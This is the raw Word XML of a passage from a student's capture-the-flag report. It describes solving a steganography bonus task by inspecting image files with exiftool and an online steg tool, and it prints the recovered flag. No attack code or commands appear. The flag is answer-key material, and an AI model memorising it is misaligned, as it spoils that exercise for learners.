      </w:pPr>
    </w:p>
    <w:p w14:paraId="602CC172" w14:textId="300617C2" w:rsidR="005409F1" w:rsidRDefault="005409F1">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA2778" w14:textId="29F40A1C" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc215147293"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>06 Bonus Task – STEG (Stenography)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4C11E82A" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1"/>
    <w:p w14:paraId="0DF2BDFD" w14:textId="77777777" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve">Downloaded the provided image file </w:t>
      </w:r>
      <w:r w:rsidRPr="005409F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>download.png</w:t>
      </w:r>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve"> from the challenge portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5489565B" w14:textId="76F352B7" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BB4A076" wp14:editId="1287034C">
            <wp:extent cx="4680284" cy="2632660"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="6502027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018" cy="263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BC227" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346F432B" w14:textId="77777777" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005409F1">
        <w:t>Verified the file type and basic structure (PNG header visible when opened in text viewer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272912A1" w14:textId="15CD02AE" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D01DEE3" wp14:editId="66638234">
            <wp:extent cx="5239753" cy="2947361"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1673059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375" cy="295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A07C" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B708991" w14:textId="34DB6E43" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005409F1">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Introduced the concept of </w:t>
      </w:r>
      <w:r w:rsidRPr="005409F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>steganography</w:t>
      </w:r>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve"> — hiding information inside image files using metadata, pixel data, or embedded text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBBBCDF" w14:textId="01816384" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EC01212" wp14:editId="0AD34750">
            <wp:extent cx="5239753" cy="2947361"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="13110681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898" cy="295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50B2" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="175A4D87" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve">Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005409F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve"> to inspect the image’s metadata and hidden fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D0350" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005409F1">
        <w:t>Checked for non-standard fields, embedded comments, or unusual metadata entries that could contain the hidden flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51551B02" w14:textId="77777777" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve">Prepared screenshots of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005409F1">
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve"> output as evidence of analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C5F10" w14:textId="39A8F69D" w:rsidR="004F7763" w:rsidRDefault="004F7763" w:rsidP="005409F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Exitfool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not working</w:t>
      </w:r>
      <w:r w:rsidR="00203C44">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F37DE1E" w14:textId="7591334E" w:rsidR="00203C44" w:rsidRDefault="00203C44" w:rsidP="00203C44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Noticed that the HTML provided in the challenge referenced </w:t>
      </w:r>
      <w:r w:rsidRPr="00203C44">
        <w:t>download.png</w:t>
      </w:r>
      <w:r>
        <w:t>, but analysis suggested it was not the correct file containing the hidden flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D51252D" w14:textId="2B128431" w:rsidR="00203C44" w:rsidRDefault="00203C44" w:rsidP="00203C44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explored the accompanying code files and identified </w:t>
      </w:r>
      <w:r w:rsidRPr="00203C44">
        <w:t>bomb.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a potential alternative image containing hidden data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780E709E" w14:textId="18B749C9" w:rsidR="00203C44" w:rsidRDefault="00203C44" w:rsidP="00203C44">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0C07FD" w14:textId="6931FC96" w:rsidR="00203C44" w:rsidRDefault="00203C44" w:rsidP="00203C44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uploaded </w:t>
      </w:r>
      <w:r w:rsidRPr="00203C44">
        <w:t>bomb.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to an online steganography tool (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stegsolve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stegonline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) to inspect the image layers and extract hidden content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D6459" w14:textId="76D76A42" w:rsidR="00203C44" w:rsidRDefault="00203C44" w:rsidP="00203C44">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00203C44">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A0CB71F" wp14:editId="5DEB4B06">
            <wp:extent cx="4440587" cy="2896819"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="165875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575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8635" cy="290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725" w:rsidRPr="00203C44">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41146A9A" wp14:editId="611C8992">
            <wp:extent cx="4482304" cy="2918765"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="110688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836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7815" cy="292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4E08" w14:textId="5CC90D93" w:rsidR="00203C44" w:rsidRDefault="00203C44" w:rsidP="00203C44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully retrieved the hidden flag from </w:t>
      </w:r>
      <w:r w:rsidRPr="00203C44">
        <w:t>bomb.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, confirming that the challenge data was embedded in this file rather than the initially provided </w:t>
      </w:r>
      <w:r w:rsidRPr="00203C44">
        <w:t>download.png</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D333D57" w14:textId="1806CF7E" w:rsidR="00562E20" w:rsidRPr="005409F1" w:rsidRDefault="00562E20" w:rsidP="00562E20">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>was :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4111D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FLAG{If_you_tried_to_solve_you_worked_like_a_hacker_but_not_thinked_like_one}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A0498" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1"/>
    <w:sectPr w:rsidR="005409F1" w:rsidRPr="005409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B7DC10" w14:textId="77777777" w:rsidR="00D470D4" w:rsidRDefault="00D470D4" w:rsidP="009F235B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="30A9902C" w14:textId="77777777" w:rsidR="00D470D4" w:rsidRDefault="00D470D4" w:rsidP="009F23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5BF031" w14:textId="77777777" w:rsidR="00D470D4" w:rsidRDefault="00D470D4" w:rsidP="009F235B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54ED3B99" w14:textId="77777777" w:rsidR="00D470D4" w:rsidRDefault="00D470D4" w:rsidP="009F23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A424451"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FA4C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90E52A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A028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0568670">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="9346366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992"/>
    <w:rsid w:val="00040992"/>
    <w:rsid w:val="000E6BE2"/>
    <w:rsid w:val="00121D3D"/>
    <w:rsid w:val="00203C44"/>
    <w:rsid w:val="002B23A0"/>
    <w:rsid w:val="0035023A"/>
    <w:rsid w:val="00365D7A"/>
    <w:rsid w:val="00453893"/>
    <w:rsid w:val="00455D3B"/>
    <w:rsid w:val="00460CC4"/>
    <w:rsid w:val="00496AB3"/>
    <w:rsid w:val="004A1F6F"/>
    <w:rsid w:val="004F7763"/>
    <w:rsid w:val="00531A5F"/>
    <w:rsid w:val="005409F1"/>
    <w:rsid w:val="00562E20"/>
    <w:rsid w:val="00587E9F"/>
    <w:rsid w:val="005C338D"/>
    <w:rsid w:val="0060191D"/>
    <w:rsid w:val="00610957"/>
    <w:rsid w:val="0062669F"/>
    <w:rsid w:val="0063785B"/>
    <w:rsid w:val="00637DCA"/>
    <w:rsid w:val="006A49F4"/>
    <w:rsid w:val="007D0726"/>
    <w:rsid w:val="008A2D80"/>
    <w:rsid w:val="008E0A14"/>
    <w:rsid w:val="00960636"/>
    <w:rsid w:val="009A0F9E"/>
    <w:rsid w:val="009A3845"/>
    <w:rsid w:val="009C74C2"/>
    <w:rsid w:val="009F235B"/>
    <w:rsid w:val="00A17C28"/>
    <w:rsid w:val="00A46DAF"/>
    <w:rsid w:val="00A5156B"/>
    <w:rsid w:val="00A55C7C"/>
    <w:rsid w:val="00AC30E2"/>
    <w:rsid w:val="00B22E4E"/>
    <w:rsid w:val="00B55082"/>
    <w:rsid w:val="00BB6944"/>
    <w:rsid w:val="00BE16D3"/>
    <w:rsid w:val="00BF6FA1"/>
    <w:rsid w:val="00C0527C"/>
    <w:rsid w:val="00C242B1"/>
    <w:rsid w:val="00C3324B"/>
    <w:rsid w:val="00C72DCE"/>
    <w:rsid w:val="00C93184"/>
    <w:rsid w:val="00CB6725"/>
    <w:rsid w:val="00CE476B"/>
    <w:rsid w:val="00D4111D"/>
    <w:rsid w:val="00D470D4"/>
    <w:rsid w:val="00D71DC9"/>
    <w:rsid w:val="00DB0B15"/>
    <w:rsid w:val="00E06A21"/>
    <w:rsid w:val="00E30DC3"/>
    <w:rsid w:val="00F02B32"/>
    <w:rsid w:val="00FE1B27"/>
    <w:rsid w:val="00FE40BD"/>
    <w:rsid w:val="00FE6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2F0D27"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E0306C01-2806-49C5-A47D-920DFBADC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09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09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09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09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09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09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09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09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09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09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409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09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099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099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09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09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09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09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09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09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09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09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09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09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09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09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09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09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0992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35023A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35023A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35023A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F23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235B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F23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235B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00203C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203C4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0AB88C-E500-4965-A6C8-F697562774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19</Pages>
  <Words>727</Words>
  <Characters>4147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Tauha Imran</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tauha Imran</cp:lastModifiedBy>
  <cp:revision>49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-24T04:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-28T13:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>